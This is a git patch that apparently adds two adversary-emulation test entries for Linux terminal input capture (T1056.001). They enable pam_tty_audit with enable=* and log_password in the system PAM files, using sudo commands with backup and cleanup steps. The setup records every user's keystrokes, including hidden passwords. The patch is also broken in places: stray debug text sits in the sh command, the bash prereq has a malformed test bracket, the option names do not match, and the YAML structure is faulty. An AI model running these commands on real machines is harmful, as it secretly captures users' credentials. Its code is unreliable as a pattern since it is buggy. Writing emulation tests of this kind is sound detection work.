From 84a16f7a6a92c88d9be6dfd552b30a7ae5607124 Mon Sep 17 00:00:00 2001 From: JB <35406993+cherokeejb@users.noreply.github.com> Date: Thu, 13 Aug 2020 23:13:23 -0500 Subject: [PATCH] Added new test, test 2 "Living off the land Terminal Input Capture on Linux with pam.d" Added for both bash and sh, including cleanup and prereq. might be useful to add get_prereq later, that would make it more noisy and not truly 'living off the land', then. --- atomics/T1056.001/T1056.001.yaml | 51 +++++++++++++++++++++++++++++++- 1 file changed, 50 insertions(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 18a9a109..0cbf242c 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -23,4 +23,53 @@ atomic_tests: cleanup_command: | Remove-Item $env:TEMP\key.log -ErrorAction Ignore name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true + - name: Living off the land Terminal Input Capture on Linux with pam.d + description: | + Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. + + Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). + + Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. + prereq_command: | + if [-f /usr/lib/pam/pam_tty_audit.so ]; then exit 0; else exit 1; fi + - linux + executor: + command: | + if [ -f /etc/pam.d/password-auth ]; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; + if [ -f /etc/pam.d/system-auth ]; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; + sudo touch /tmp/password-auth.bk + sudo touch /tmp/system-auth.bk + sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth + sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth + sudo pam-auth-update --package --force + cleanup_command: | + sudo mv /tmp/password-auth.bk /etc/pam.d/password-auth + sudo mv /tmp/system-auth.bk /etc/pam.d/system-auth + name: bash + elevation_required: true + - name: Living off the land Terminal Input Capture on Linux with pam.d + description: | + Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. + + Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). + + Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. + prereq_command: | + if test -f /usr/lib/pam/pam_tty_audit.so; then exit 0; else exit 1; fi + - linux + executor: + command: |if test -f "foobo"; then echo "heya"; else "nope";fi +heya + if test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; + if test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; + sudo touch /tmp/password-auth.bk + sudo touch /tmp/system-auth.bk + sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth + sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth + sudo pam-auth-update --package --force + cleanup_command: | + sudo mv /tmp/password-auth.bk /etc/pam.d/password-auth + sudo mv /tmp/system-auth.bk /etc/pam.d/system-auth + name: sh + elevation_required: true